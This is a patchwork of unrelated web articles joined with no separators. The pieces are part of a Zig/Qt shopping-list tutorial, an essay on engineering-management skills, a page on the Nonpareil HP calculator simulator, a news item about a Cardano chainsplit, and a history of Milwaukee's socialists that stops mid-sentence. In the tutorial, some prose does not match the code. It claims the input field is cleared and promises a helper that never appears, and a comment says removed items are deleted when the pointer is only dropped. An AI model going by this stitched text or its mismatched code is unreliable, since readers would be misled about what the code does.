fn on_clear_all(self: ?*anyopaque) callconv(.c) void {
    if (get_ctx_for(self)) |ctx| {
        qlistwidget.Clear(ctx.list_widget);
        return;
    }
}

fn on_clear_bought(self: ?*anyopaque) callconv(.c) void {
    if (get_ctx_for(self)) |ctx| {
        const count = qlistwidget.Count(ctx.list_widget);
        // iterate backwards so removing items doesn't shift unprocessed indices
        var i: c_int = count - 1;
        while (i >= 0) : (i -= 1) {
            const itm = qlistwidget.Item(ctx.list_widget, i);
            if (itm == null) continue;
            const state = qlistwidgetitem.CheckState(itm);
            if (state != 0) {
                // remove and delete the item
                const taken = qlistwidget.TakeItem(ctx.list_widget, i);
                // taken is removed from the widget; drop the pointer (Qt will clean up)
                _ = taken;
            }
        }
    }
}
As you can see in
on_clear_all
the logic is pretty straightforward, we simply call
qlistwidget.Clear
and give it a reference to our list widget, then Qt will handle the rest for us.
The more clever part is on_clear_bought. Here we iterate through all the items in the list widget and check their state. Since bought items get sorted to the bottom of the list when the user ticks them as "done" (or in this case "bought"), we could optimize this a bit by iterating backwards through the list and stopping as soon as we find an unbought item, because all bought items will be at the bottom. The version above iterates backwards mainly so that removing an item doesn't shift the indices of items we haven't processed yet.
All that's left to do is to hook these two up to their respective buttons:
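Wiring them up mirrors the Add button; the button variable names below are simply whatever you called the two QPushButtons when creating them:

qpushbutton.OnClicked(clear_all_btn, on_clear_all);
qpushbutton.OnClicked(clear_bought_btn, on_clear_bought);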
Finally, we need to handle changes to the items themselves. In our shopping list, items can be marked as bought by checking a checkbox next to them. In Qt, this is done via the CheckState property of a QListWidgetItem. Whenever the user checks or unchecks an item, we want to:
Apply a strikethrough effect to indicate that the item is bought.
Move the bought item to the bottom of the list to keep unbought items at the top.
fn on_item_changed(self: ?*anyopaque, item: ?*anyopaque) callconv(.c) void {
    if (get_ctx_for(self)) |ctx| {
        if (item == null) return;
        const state = qlistwidgetitem.CheckState(item);
        const is_checked = (state != 0);
        const font = qlistwidgetitem.Font(item);
        if (font) |f| {
            qfont.SetStrikeOut(f, is_checked);
            qlistwidgetitem.SetFont(item, f);
        }
        const row = qlistwidget.Row(ctx.list_widget, item);
        if (row < 0) return;
        const taken = qlistwidget.TakeItem(ctx.list_widget, row);
        if (taken == null) return;
        if (is_checked) {
            qlistwidget.AddItem2(ctx.list_widget, taken);
        } else {
            qlistwidget.InsertItem(ctx.list_widget, 0, taken);
        }
    }
}
Notice how we use
TakeItem
to temporarily remove the item from the list, then re-insert it in the appropriate position. This is a common trick in Qt when you want to reorder items dynamically.
This ensures that every time an item’s checkbox is toggled, the visual state updates and the item is moved accordingly.
Handling the Return Key
For convenience, we also allow the user to add items by pressing Enter in the input field. This is done using the
OnReturnPressed
signal of
QLineEdit
:
fn on_return_pressed(self: ?*anyopaque) callconv(.c) void {
    if (get_ctx_for(self)) |ctx| {
        const text = qlineedit.Text(ctx.item_input, allocator);
        // free the copied text on every path, including the early error return below
        defer allocator.free(text);
        if (text.len != 0) {
            add_item(ctx, text) catch return;
        }
    }
}

qlineedit.OnReturnPressed(item_input, on_return_pressed);
This function simply grabs the text from the input, adds the item if it’s non-empty, and clears the input field.
Adding Items Helper
Both the Add button and the Enter key use the same helper function to actually create and insert the list item:
This makes it easy to maintain consistent behavior across multiple input methods. Notice the item flags set on each new item: Qt::ItemIsUserCheckable is what allows the checkbox to appear next to the item.
Result
At this point, all the interactive logic is wired up. Users can:
Type an item and press Enter or click Add to add it.
Check/uncheck items to mark them bought/unbought with a strikethrough effect.
Clear all items or only bought items using the respective buttons.
Automatically reorder items so unbought items remain at the top.
The result is a fully functional, minimal shopping list application built entirely in Zig using direct Qt bindings.
With the functionality in place, the next step is to make the application actually look nice. Qt widgets come with default styles that are functional but not particularly attractive. Fortunately, Qt supports CSS-like styling through SetStyleSheet, and libqt6zig exposes this feature directly.
This way you can easily tweak the styles without recompiling the app each time. Additionally, you can store the style sheet file anywhere on your system and, if you want to get fancy, allow users to customize the look of the app by providing their own style sheets.
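A sketch of loading such a file at startup (std.fs is standard Zig; "style.qss" is an arbitrary path, and whether SetStyleSheet hangs off qwidget or qapplication in the bindings is my assumption):

// Read an external Qt style sheet and apply it to the main window.
if (std.fs.cwd().readFileAlloc(allocator, "style.qss", 64 * 1024)) |css| {
    defer allocator.free(css);
    qwidget.SetStyleSheet(window, css); // assumed binding for QWidget::setStyleSheet
} else |_| {
    // No style sheet found; fall back to Qt's default look.
}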
Running the Application
Now we just need to show the window and start the event loop:
qwidget.Show(window);
_ = qapplication.Exec();
And there we have it, a simple yet fully functional shopping list application, built entirely with
Zig
and
Qt
using direct bindings, with not a hint of
QML
in sight. Sure, I opted to rely heavily on opaque pointers, trading off some type safety for convenience and rapid development, and I fully accept that tradeoff. For a more serious project, I would strongly recommend finding a way to make the code safer and more type-aware. Yet, despite these compromises, I was able to produce a complete, cross-platform GUI application in surprisingly little time and with minimal code. I honestly didn’t think it would be this straightforward. This is a testament both to the power of
Zig
as a systems programming language and to the excellent work of
rcalixte
in creating the
libqt6zig
bindings.
This wasn’t the only experiment I tried with
libqt6zig
. I also built a minimal launcher for my
Hyprland
setup, which presented some intriguing challenges related more to
Wayland
than the library itself. With a mix of clever window flags, absolute positioning, and careful sizing, I managed to create a “floating” window that escaped
Hyprland
’s tiling behavior. Thankfully,
libqt6zig
is robust enough that I didn’t need to manipulate
XCB
or
wlroots
directly. The bindings handled everything for me, which made the process far smoother, though it required some trial and error.
During these experiments, I also felt the absence of features like generics and compile-time reflection, which would have allowed for cleaner, more type-safe abstractions. While
Zig
does offer
comptime
capabilities, I couldn’t quite achieve what I envisioned. I also missed having access to a
QTNativeWindow
abstraction, which would have simplified certain window management tasks. These limitations stem more from the current state of the bindings than from
Qt
itself. I’ve discussed these points with the library’s author, who is aware and might implement them in the future. Until then, patience is key. We’re benefiting from the dedication of a single maintainer producing high-quality, low-level bindings for
Zig
.
Reflections on the Library
Working with
libqt6zig
was an eye-opening experience. Right from the start, I was impressed by how faithfully it exposes Qt’s C++ API while keeping the interface accessible to Zig developers. The library is surprisingly complete, covering most of the widgets, layouts, and common functionality you would expect from a typical Qt project. Despite being maintained by a single developer, the bindings are robust and consistent, which made experimentation smooth and enjoyable.
One thing that stood out is how much control you get over the GUI elements. Every widget, layout, and property is explicit, which forces you to think about your UI structure carefully. Unlike higher-level frameworks that abstract away the details,
libqt6zig
lets you handle memory management, widget hierarchies, and layout logic directly. This level of control can be intimidating at first, but it quickly becomes empowering once you get used to it. You feel like you are working with the core of the system rather than relying on layers of abstraction.
At the same time, the library has some limitations. Working with opaque pointers can feel risky because it removes compile-time type safety, and the lack of certain abstractions like generics or a
QTNativeWindow
wrapper means you occasionally need to write more boilerplate. However, these trade-offs are manageable, and the experience is educational. You learn not only how Qt works but also how to structure a cross-platform GUI application effectively in Zig.
Overall, my experience with
libqt6zig
was extremely positive. It made creating a fully functional shopping list application straightforward and even enjoyable. The library is well-documented, the API feels natural for Zig, and the bindings handle the low-level details so you can focus on building your application rather than wrestling with the underlying system. The potential for future improvements is exciting, and I look forward to seeing how the library evolves.
Conclusion
In conclusion, using
Zig
with
libqt6zig
provides a powerful combination for building cross-platform GUI applications. While it requires attention to memory management and pointer safety, the explicitness and control make it a rewarding experience. You can produce functional, responsive, and visually appealing applications with surprisingly little code.
For anyone interested in exploring GUI development in Zig,
libqt6zig
is an excellent starting point. It demonstrates that Zig can be used effectively beyond systems programming, opening the door to lightweight, high-performance desktop applications. The library is already impressive, and with continued development, it could become a go-to choice for Zig developers looking to build modern GUIs. My experiments with both the shopping list application and my Hyperland launcher showed that even complex interactions are achievable with patience and careful design. Overall, this experience reinforced my enthusiasm for Zig and its growing ecosystem, and it leaves me optimistic about the future of GUI development in this language.
References and Resources
If you want to explore
libqt6zig
yourself or learn more about the library and its author, here are some useful links:
As I get older, I increasingly think about
whether I’m spending my time the right way
to advance my career and my life.
This is also a question that your company
asks about you every performance cycle:
is this engineering manager spending their
time effectively to advance the company or their organization?
Confusingly, in my experience, answering these nominally similar questions
has surprisingly little in common.
This piece spends some time exploring both questions in the particularly
odd moment we live in today, where managers are being told they’ve
spent the last decade doing the wrong things, and need to engage
with a new model of engineering management in order to be
valued by the latest iteration of the industry.
If you’d be more interested in a video version of this,
here is the recording of a practice run I gave for a talk
centered on these same ideas
(
slides from talk
).
Good leadership is a fad
When I started my software career at Yahoo in the late 2000s, I had two 1:1s with my manager over the course of two
years. The first one came a few months after I started, and he mostly asked me about a colleague’s work quality.
The second came when I gave notice that I was leaving to
join Digg
.
A modern evaluation of this manager would be scathing, but his management style closely resembled that of the
team leader in
The Soul of A New Machine
:
identifying an important opportunity for the team, and navigating the broader organization that might impede progress
towards that goal.
He was, in the context we were working in, an effective manager.
Compare that leadership style to the expectations of the 2010s, where attracting, retaining, and motivating engineers
was emphasized as the most important leadership criteria in many organizations.
This made sense in
the era of hypergrowth
, where budgets were uncapped
and many companies viewed hiring strong engineers as their constraint on growth.
This was an era where managers were explicitly told to stop writing software as the first step of their transition into management,
and it was good advice! Looking back we can argue it was bad guidance by today’s standards, but it aligned the managers with the leadership expectations
of the moment.
Then think about our current era, that started in late 2022, where higher interest rates killed
zero-interest-rate-policy (ZIRP)
and productized large language models are positioned as killing deep Engineering organizations.
We’ve flattened Engineering organizations where many roles that previously focused on coordination
are now expected to be hands-on keyboard, working deep in the details.
Once again, the best managers of the prior era–who did exactly what the industry asked them to do–are now reframed as bureaucrats
rather than integral leaders.
In each of these transitions, the business environment shifted, leading to a new formulation of ideal leadership.
That makes a lot of sense: of course we want leaders to fit the necessary patterns of today.
Where things get weird is that in each case a morality tale was subsequently superimposed on top of the transition:
In the 2010s, the morality tale was that it was all about empowering engineers as a fundamental good.
Sure, I can get excited for that, but I don’t really believe that narrative: it happened because hiring was competitive.
In the 2020s, the morality tale is that bureaucratic middle management have made organizations stale and inefficient.
The lack of experts has crippled organizational efficiency.
Once again, I can get behind that–there’s truth here–but the much larger drivers aren’t about morality,
it’s about ZIRP-ending and optimism about productivity gains from AI tooling.
The conclusion here is clear: the industry will want different things from you as it evolves,
and it will tell you that each of those shifts is because of some complex moral change,
but it’s pretty much always about business realities changing.
If you take any current morality tale as true, then you’re setting yourself up
to be severely out of position when the industry shifts again in a few years,
because “good leadership” is just a fad.
Self-development across leadership fads
If you accept the argument that the specifically desired leadership skills of today
are the result of fads that frequently shift, then it leads to an important followup question:
what are the right skills to develop in to be effective today and to be impactful across fads?
Having been and worked with engineering managers for some time, I think there are
eight foundational engineering management skills
,
which I want to personally group into two clusters: core skills that are essential to operate in all roles
(including entry-level management roles), and growth skills whose presence–or absence–determines
how far you can go in your career.
The core skills are:
Execution: lead team to deliver expected tangible and intangible work. Fundamentally, management is about getting things done, and you’ll neither get an opportunity to begin managing, nor stay long as a manager, if your teams don’t execute.
Team: shape the team and the environment such that they succeed. This is not working for the team, nor is it working for your leadership, it is finding the balance between the two that works for both.
Examples: hiring, coaching, performance management, advocating with your management
Ownership: navigate reality to make consistent progress, even when reality is difficult. Finding a way to get things done, rather than finding a way for its not getting done to be someone else’s fault.
Examples: doing hard things, showing up when it’s uncomfortable, being accountable despite systemic issues
Alignment: build shared understanding across leadership, stakeholders, your team, and the problem space. Finding a realistic plan that meets the moment, without surprising or being surprised by those around you.
Examples: document and share top problems, and updates during crises
The growth skills are:
Taste: exercise discerning judgment about what “good” looks like—technically, in business terms, and in process/strategy. Taste is a broad church, and my experience is that broad taste is a somewhat universal criterion for truly senior roles. In some ways, taste is a prerequisite to Amazon’s Are Right, A Lot.
Examples: refine a proposed product concept, avoid a high-risk rewrite, find usability issues in the team’s work
Clarity: your team, stakeholders, and leadership know what you’re doing and why, and agree that it makes sense. In particular, they understand how you are overcoming your biggest problems. So clarity is not “Struggling with scalability issues” but instead “Sharding the user logins database in a new cluster to reduce load.”
Examples: identify levers to progress, create a plan to exit a crisis, show progress on implementing that plan
Navigating ambiguity: work from complex problem to opinionated, viable approach. If you’re given an extremely messy, open-ended problem, can you still find a way to make progress? (I’ve written previously about this topic.)
Examples: launching a new business line, improving developer experience, going from 1 to N cloud regions
Working across timescales: ensure your areas of responsibility make progress across both the short and long term. There are many ways to appear successful by cutting corners today that end in disaster tomorrow. Success requires understanding, and being accountable for, how different timescales interact.
Examples: have an explicit destination, ensure short-term work steers towards it, be long-term rigid and short-term flexible
Having spent a fair amount of time pressure testing these, I’m pretty sure most effective managers, and manager archetypes, can be fit into these boxes.
Self-assessing on these skills
There’s no perfect way to measure anything complex, but here are some thinking
questions for you to spend time with as you assess where you stand on each of these skills:
Execution
When did your team last have friction delivering work? Is that a recurring issue?
What’s something hard you shipped that went really, really well?
When were you last pulled onto solving a time-sensitive, executive-visible project?
Team
Who was the last strong performer you hired?
Have you retained your strongest performers?
What strong performers want to join your team?
Which peers consider your team highly effective?
When did an executive describe your team as exceptional?
Ownership
When did you or your team overcome the odds to deliver something important? (Would your stakeholders agree?)
What’s the last difficult problem you solved that stayed solved (rather than reoccurring)?
When did you last solve the problem first before addressing cross-team gaps?
Alignment
When was the last time you were surprised by a stakeholder? What could you do to prevent that from recurring?
How does a new stakeholder come to understand your prioritization tradeoffs (including the rationale)?
When did you last disappoint a stakeholder without damaging your relationship?
What stakeholders would join your company because they trust you?
Taste
What’s a recent decision that is meaningfully better because you were present?
If your product counterpart left, what decisions would you struggle to make?
Where’s a subtle clarification that significantly changed a design or launch?
How have you inflected your team’s outcomes by seeing around corners?
Clarity
What’s a difficult trade-off you recently helped your team make?
How could you enable them to make that same trade-off without your direct participation?
What’s a recent decision you made that was undone? How?
Navigating ambiguity
What problem have you worked on that was stuck before you assisted, and unstuck afterwards?
How did you unstick it?
Do senior leaders bring ambiguous problems to you? Why?
Working across timescales
What’s a recent trade off you made between short and long-term priorities?
How do you inform these tradeoffs across timescales?
What long-term goals are you protecting at significant short-term cost?
Most of these questions stand on their own, but it’s worth briefly explaining
the “Have you ever been pulled into a SpecificSortOfProject by an executive?” questions.
My experience is that in most companies, executives will try to poach you onto their most
important problems that correspond to your strengths.
So if they’re never attempting to pull you in, then either you’re not considered particularly
strong on that dimension, or you’re already so saturated with other work that it doesn’t
seem possible to pull you in.
Are “core skills” the same over time?
While the groupings of “core” and “growth” skills seem obvious to me,
what I came to appreciate while writing this is that some skills swap between core and growth
as the fads evolve.
Where execution is a foundational skill today, it was less of a core skill in the hypergrowth era,
and even less so in the investor era.
This is the fundamentally tricky part of succeeding as an engineering manager across fads:
you need a sufficiently broad base across each of these skills to be successful, otherwise
you’re very likely to be viewed as a weak manager when the eras unpredictably end.
Stay energized to stay engaged
The “Manage your priorities and energy” chapter in The Engineering Executive’s Primer
captures an important reality that took me too long to understand:
the perfect allocation of work is not the mathematically ideal allocation that maximizes impact.
Instead, it’s the balance between that mathematical ideal and doing
things that energize you enough to stay motivated over the long haul.
If you’re someone who loves writing software, that might mean writing a bit more code than is strictly helpful to your team.
If you’re someone who loves streamlining an organization, it might mean improving a friction-filled process that feels like a personal affront, even if it’s not causing that much overall inefficiency.
Forty-year career
Similar to the question of prioritizing activities to stay energized, there’s also understanding
where you are in your career, an idea I explored in A forty-year career.
For each role, you have the chance to prioritize across different dimensions like pace, people, prestige, profit, or learning.
There’s no “right decision,” and there are always tradeoffs.
The decisions you make early in your career will compound over the following forty years.
You also have to operate within the constraints of your life today and your possible lives tomorrow.
Early in my career, I had few responsibilities to others, and had the opportunity to work extremely hard
at places like Uber. Today, with more family responsibilities, I am unwilling to make the tradeoffs to
consistently work that way, which has real implications on how I think about which roles to prioritize
over time.
Recognizing these tradeoffs, and making them deliberately, is one of the highest value things you can do
to shape your career. Most importantly, it’s extremely hard to have a career at all if you don’t think about
these dimensions and have a healthy amount of self-awareness to understand the tradeoffs that will allow you
to stay engaged over half a lifetime.
Nonpareil is a high-fidelity simulator for calculators. It currently
supports many HP calculator models introduced between 1972 and 1982.
Simulation fidelity is achieved through the use of the actual microcode
of the calculators, thus in most cases the simulation behavior exactly
matches that of the real calculator. In particular, numerical results
will be identical, because the simulator is using the BCD arithmetic
algorithms from the calculator.
Nonpareil is not an HP product, and is not supported or warranted
by HP.
Calculator Models
Nonpareil currently simulates many calculators that were developed and
introduced from 1972 to 1982 by:
HP Advanced Products Division in Cupertino, California
HP Corvallis Division in Corvallis, Oregon
HP Fort Collins Division (models adapted from base designs by
APD or the Corvallis Division)
The model numbers shown are currently simulated by Nonpareil, unless
struck out.
Support for additional models will be added over time.
Series: Classic, Woodstock, Topcat/Sting, Cricket, Spice, Coconut, Voyager

Scientific models: HP-35, HP-45, HP-46, HP-55, HP-65, HP 9805, HP-21, HP-25, HP-25C, HP-29C, HP-67, HP-91, HP-95C, HP-97, HP-97S, HP-19C, HP-31E, HP-32E, HP-33E, HP-33C, HP-34C, HP-41C, HP-41CV, HP-41CX, HP-10C, HP-11C, HP-15C

Financial models: HP-70, HP-80, HP-81, HP-22, HP-92, HP-37E, HP-38E, HP-38C, HP-12C

Scientific/Financial models: HP-27

Other models: HP-10, HP-01, HP-16C

Processor architectures used across these series: Classic, Woodstock, Cricket, Nut
The HP-67 is considered by many people to be part of the Classic series
since it is packaged similarly to the HP-65, but electrically it is
really a Woodstock series machine.
The classic series chip set was also used in the HP-46 and HP-81, which
were desktop printing versions of the HP-45 and HP-80, respectively, and
the HP 9805A desktop calculator. The same chip set was also used in the
HP 1722A Oscilloscope, the HP 3380A Integrator (for Gas Chromatography),
and in several HP Gas Chromatographs.
The HP-27 was HP's only combined scientific/financial calculator until
the HP-27S was introduced in 1986.
The HP-10 was a basic four-function printing non-RPN calculator.
The HP-01 is a calculator watch (non-RPN). While all the other models
listed here use a 56-bit (14-digit) word, the HP-01 uses a 48-bit
(12-digit) word. The processor architecture is otherwise similar to
Woodstock.
Download
Nonpareil is made available under the terms of the Free Software Foundation's
General Public License, Version 2. There is NO WARRANTY for Nonpareil.
Source code is available from a GitHub repository. Precompiled binaries are not currently available.
Microcode for supported calculator models is included in the Nonpareil
source code distribution.
Microcode-Level Calculator Simulation
PDF, 485K, presented at the HHC 2004 conference in San Jose, California on 26-SEP-2004 (complete with errors; for instance, the IBM System/360 was introduced in 1964, not 1961)
Credits
David G. Hicks of the Museum of HP Calculators has provided scanned images of the calculators for use in Nonpareil.
Maciej Bartosiak improved the display code of my earlier NSIM simulator enough that I now use its rendered output as the background graphic for the HP-41CV in Nonpareil.
David G. Hicks has ported the simulator portion of an earlier release
to Java and made it available as an
applet
that may be run in Java-enabled web browsers.
Egan Ford has ported Nonpareil to the Sharp Zaurus,
and reports that it should work on the Nokia N810 web tablet as well.
Maciej Bartosiak has developed a Mac OS X port of Nonpareil, as well as a port of my earlier nsim HP-41C simulator.
Cardano founder calls the FBI on a user who says his AI mistake caused a chainsplit
Web3 Is Going Great
web3isgoinggreat.com
2025-11-23 20:02:56
On November 21, the Cardano blockchain suffered a major chainsplit after someone created a transaction that exploited an old bug in Cardano node software, causing the chain to split. The person who submitted the transaction fessed up on Twitter, writing, "It started off as a 'let's see if I can reproduce the bad transaction' personal challenge and then I was dumb enough to rely on AI's instructions on how to block all traffic in/out of my Linux server without properly testing it on testnet first, and then watched in horror as the last block time on explorers froze."
Charles Hoskinson, the founder of Cardano, responded with a tweet boasting about how quickly the chain recovered from the catastrophic split, then accused the person of acting maliciously. "It was absolutely personal", Hoskinson wrote, adding that the person's public version of events was merely him "trying to walk it back because he knows the FBI is already involved". Hoskinson added, "There was a premeditated attack from a disgruntled [single pool operator] who spent months in the Fake Fred discord actively looking at ways to harm the brand and reputation of IOG. He targeted my personal pool and it resulted in disruption of the entire cardano network."
Hoskinson's decision to involve the FBI horrified some onlookers, including one other engineer at the company who publicly quit after the incident. They wrote, "I've fucked up pen testing in a major way once. I've seen my colleagues do the same. I didn't realize there was a risk of getting raided by the authorities because of that + saying mean things on the Internet."
In 1910, Milwaukee’s socialists swept into office and they proceeded to run the city for most of the next fifty years. Though ruling elites initially predicted chaos and disaster, even
Time magazine by 1936 felt obliged to run a cover story
titled “Marxist Mayor” on the city’s success, noting that under socialist rule “Milwaukee has become perhaps the best-governed city in the US.”
This experience is rich in lessons for Zohran Mamdani and contemporary Left activists looking to lean on City Hall to build a working-class alternative to Democratic neoliberalism and Donald Trump’s authoritarianism. But the history of Milwaukee’s so-called sewer socialists is much more than a story simply about local Left governance. The rise and effectiveness of the town’s socialist governments largely depended on a radical political organization rooted in Milwaukee’s trade unions and working class.
Nowhere in the US were socialists stronger than in Milwaukee. And Wisconsin was the state with the most elected socialist officials as well as the highest number of socialist legislators (see Figure 1). It was also the only state in America where socialists consistently led the entire union movement — indeed, it was primarily their roots in organized labor that made their electoral and policy success possible, including the
passage of 295 socialist-authored bills statewide between 1919 and 1931.
Figure 1. Source: James Weinstein, The Decline of Socialism in America (1967), 118.
Contrary to what much of the literature on sewer socialism has suggested, the party’s growth did not come at the cost of dropping radical politics. That they didn’t get closer to overthrowing capitalism was due to circumstances outside of their control, including relatively conservative public opinion. And the fact that they
did achieve so much was because they flexibly concretized socialist politics for America’s uniquely challenging context.
The Rise of Sewer Socialism
Sewer socialism’s rise was far from automatic or rapid. Though Milwaukee’s largely German working class was perhaps somewhat more open to socialist ideas than some other ethnicities, a quantitative
study of pre-war US immigrant voting found that Germans were negatively correlated with socialist votes nationwide.
Figure 2 captures the party’s slow-but-steady rise over many decades. Here’s how the party’s founder,
Victor Berger, described this dynamic in a speech following their big 1910 mayoral election victory:
“It took forty years to get a Socialist Mayor and administration in Milwaukee since first a band of comrades joined together. … It didn’t come quickly or easily to us. It meant work. Drop by drop until the cup ran over. Vote by vote to victory. Work not only during the few weeks of the campaign, but every month, every week, every day. Work in the factories and from house to house.”
Figure 2. Data compiled by author.
Milwaukee’s history is a useful natural experiment for testing the viability of competing socialist strategies in the US. Both moderate and intransigent variants of Marxism were present and the latter had nearly a two-decade-long head start. The Socialist Labor Party (SLP) was the only game in town from 1875 onwards until Berger, a former SLP member, founded a more moderate rival socialist newspaper,
Vorwärts
(Forward), in 1893.
By the early nineties, the SLP under the leadership of Daniel De Leon had crystallized its strategy: run electoral campaigns to propagate the fundamental tenets of Marxism and build industrial unions to displace the reformist, craft-based American Federation of Labor (AFL). Had American workers been more radically inclined, the SLP’s strategy
could have caught on — indeed, something close to this approach guided
the early German Social Democracy as well as revolutionary Marxists across imperial Russia. But by 1900, Berger’s Social Democratic Party (SDP) had clearly eclipsed its more-radical rivals.
Victor Berger (right) with Eugene Debs. Berger recruited Debs to socialism in 1895, while the latter was imprisoned in Woodstock, IL.
Pragmatic Marxism
What were the politics of Berger’s new current? Berger and his comrades are usually
depicted as “reformists” for whom “change would come through evolution and democracy, and not through revolution.” In reality, the sewer socialists were — and remained — committed Marxists
who saw the fight for reforms as a necessary means not only to improve the lives of working people, but also to strengthen working-class consciousness, organization, and power in the direction of socialist revolution in the US and across the globe.
Here’s how Berger articulated this vision in the founding 1911 issue of
The Milwaukee Leader, his new English-language socialist daily newspaper: “The distinguishing trait of Socialists is that they understand the class struggle” and that “they boldly aim at the revolution because they want a radical change from the present system.”
Issue One of The Milwaukee Leader, with a cartoon of the newspaper’s ship sinking capitalism (1911).
Reacting against De Leon’s doctrinaire rigidity and marginality, Berger consciously sought to Americanize scientific socialism. Berger argued that socialists in the US “must give up forever the slavish imitation of the ‘German’ form of organization and the ‘German’ methods of electioneering and agitation.” Since the specifics of what to do in the US were not self-evident, this strategic starting point facilitated a useful degree of political humility and empirical curiosity.
One of the things Berger learned was that socialist propaganda would not widely resonate as long as most American workers remained resigned to their fate. This, he explained, was the core flaw in the SLP’s assumption that patiently preaching socialism would eventually convince the whole working class:
The most formidable obstacle in the way of further progress—and especially in the propaganda of Socialism—is not that men are insufficiently versed in political economy or lacking in intelligence. It is that people are without hope. … Despair is the chief opponent of progress. Our greatest need is hope.
It was precisely to overcome widespread feelings of popular resignation that the sewer socialists came to focus so much on fights for immediate demands, both at work and within government. Since “labor learns in the school of experience,” successful struggles even around relatively minor issues would tend to raise workers’ confidence, expectations, and openness to socialist ideas.
It was easy to play with “revolutionary phrases,” but Berger noted that this did not do much to move workers closer to socialism. While it was important to continue propagating the big ideas of socialism, what America’s leftists needed above all was “concrete political achievements, not theoretical treatises ... less mouth-work, more footwork.” Armed with this orientation, Berger and his comrades set out to win over a popular majority — starting with Milwaukee’s trade union activists.
Cartoon from
The Milwaukee Leader
(1911) showing Berger’s socialism car knocking over the profiteers and political opposition.
Rooting Socialism in the Unions
By the time Berger arrived on the scene, Milwaukee already had a rich tradition of
workplace militancy
and unionism. Crucially, Berger’s current sought to transform established unions rather than enter into competition with them by setting up new socialist-led unions, as was the practice of the SLP and, later on, the Wobblies.
Years of hard work within the unions paid off. In December 1899, Milwaukee’s Federated Trades Council elected an executive committee made up entirely of socialists, including Berger. For the next quarter century, the leadership of the party and the unions statewide formed an “interlocking directorate” of working-class socialists involved in both formations. Nowhere else in the US did socialists become so hegemonic in the labor movement as they did in Milwaukee and Wisconsin.
A historian of Milwaukee unions notes
the “inheritance Socialists bequeathed to the labor movement”: democratic norms; support for industrial (rather than craft) unionism; the absence of corruption; support for workers’ education; and strong political advocacy. Wisconsin’s socialists could not have achieved much without their union base. And precisely because they had succeeded in transforming established AFL unions by “boring from within,” they fought a relentless two-front
war nationally against the self-isolating dual unionist efforts of left-wing Socialists and the Wobblies, on the one hand, and the narrow-minded AFL leadership of Samuel Gompers, on the other.
Building the Party
The anti-Socialist
Milwaukee Free Press
ruefully noted in 1910 that “there would not today be such sweeping Social-Democratic victories in Milwaukee if that party did not possess a solidarity of organization and purpose which is unequaled by that of any other party in the county, or, for that matter, in the state.”
Building this machine took years of experimentation and refinement under the guidance of Edmund Melms, an affable factory worker. Such a focus on organizing, with its emphasis on developing new working-class leaders, was crucial for helping Milwaukee’s socialists avoid the constant turnover and churn that undermined so many other SPA chapters.
SDP comrades preparing a “bundle brigade.” Source:
History of the Milwaukee Social-Democratic Victories
(1911).
One of Melms’s organizational innovations was the party’s soon-to-be famous “bundle brigade.” During electoral campaigns, between 500 and 1,000 party members on Sunday mornings would pick up the SDP’s four-page electoral newspaper at 6 a.m. and deliver it to every home in town by 9 a.m. No other parties attempted anything this ambitious because they lacked sufficient volunteer capacity, not just for delivery but also for determining the language spoken in each house; party members would have to canvass their neighborhoods ahead of time to determine whether the house should receive literature in German, English, or Polish.
Melms’s second innovation was to hold a Socialist carnival every winter. These were massive events with over 10,000 participants, attracting (and raising funds from) community members well beyond the SDP’s ranks. In addition to these yearly carnivals, the party held all sorts of social activities which helped grow and cohere the movement. These included picnics, parades, card tournaments, dress balls, parties, concerts, baseball and basketball games, plays, and vaudeville shows. And some party branches were particularly proud of their singers. As one participant recalled, “Did you love song? Attend an affair of Branch 22.”
Students of the South Side Socialist Sunday School (1917). Source: Milwaukee Public Library
Whereas patronage and graft greased the wheels of other party machines, the socialists had to depend on selflessness derived from political commitment. While most people who voted for the SDP were interested primarily in winning immediate changes, there were also additional, loftier motivations undergirding the decision of so many working-class men, women, and teenagers to do thankless tasks like getting up early on cold Sunday mornings to distribute socialist literature. Historian-participant Elmer Beck is
right that “the dreams, visions, and prophecies of the socialists … were an extremely vital factor in the rise of the socialist tide.”
Message and Demands
With its eyes planted on the goal of winning a majority of Milwaukeeans and Wisconsinites to socialism, the SDP was obsessed with spreading its message. Between 1893 and 1939, the party published twelve weekly newspapers, two dailies, one monthly magazine, as well as countless pamphlets and fliers.
Class consciousness was the central political point stressed in all the party’s agitation and publications — virtually everything was framed as a fight of workers against capitalists. Linked to this class analysis was a relentless focus on workers’ material needs: for instance, one of the SDP’s most impactful early leaflets was directed at working-class women: “Madam—how will you pay your bills?” This attention to material needs was one of the key reasons the SDP was able to build such a deep base. Indeed, the party’s ability to recruit — and retain — so many workers depended on delivering tangible improvements to their lives (unlike so many other SPA chapters, which had to rely on ideological recruitment alone).
After 1904, immediate demands took on an increasingly central place in the SDP’s election campaigns. Had Milwaukee’s socialists lost sight of their socialist goals? Hardly. Up through its demise in the late 1930s, the party never ceased propagandizing for socialism and proposing ambitious but not-yet-winnable reforms. But Milwaukee’s sewer socialists believed that running to win in electoral contests — and seriously fighting to pass policy changes once in power — made it possible to recruit a larger, not smaller, number of workers to socialist politics.
Cartoon from
The Milwaukee Leader
(1911)
The comparative data on party membership bears out this hypothesis. By 1912, roughly one out of every hundred people in Milwaukee
was a member of the Social Democratic Party. No other city in America had anything close to this level of strength; in contrast, New York City, another socialist bastion, had one member for every thousand inhabitants. Had the Socialist Party of America been as strong as Milwaukee’s SDP, it would have had about one million members — roughly the same size as German Social Democracy, the world’s largest socialist party.
In a challenging American political context, Wisconsin’s socialists pushed as far as possible without losing their base. Rigorous
comparative histories of US leftism have shown that all
of the most successful instances of mass working-class politics in America have adopted some form of this kind of pragmatic radicalism, including Minnesota’s
Farmer-Labor Party, New York’s Jewish immigrant socialism, and the Popular Front Communists of the late 1930s.
Nevertheless, far left socialists elsewhere in the country — whose tactical rigidity was both a cause and consequence of their weaker roots in the class — frequently criticized their Wisconsin comrades’ supposed “opportunism.” In 1905, for example, the national leadership of the SPA expelled Berger from the body for suggesting in an article that Milwaukeeans vote against a right-wing judge in a non-partisan race that the party did not have the capacity to contest. Berger
lambasted this “heresy hunt without a heresy” and he succeeded in winning back his post through an SPA membership referendum, the national (and local) party’s highest decision-making structure. Episodes such as these led the SDP to jealously guard its autonomy from national Socialist Party of America structures that periodically succumbed to leftist dogmatism.
Successfully Governing Milwaukee
It was a challenging task, requiring constant wagers and adjustments, to pull the mass of working people toward socialism without undermining this process by jumping too far ahead. “Never swing to the right or too far to the left,” advised Daniel Hoan, the party’s mayor from 1916 through 1940. But concretizing this axiom into practical politics was easier said than done — especially once the party had to govern.
Given the powerful forces arrayed against them, and the
unique obstacles
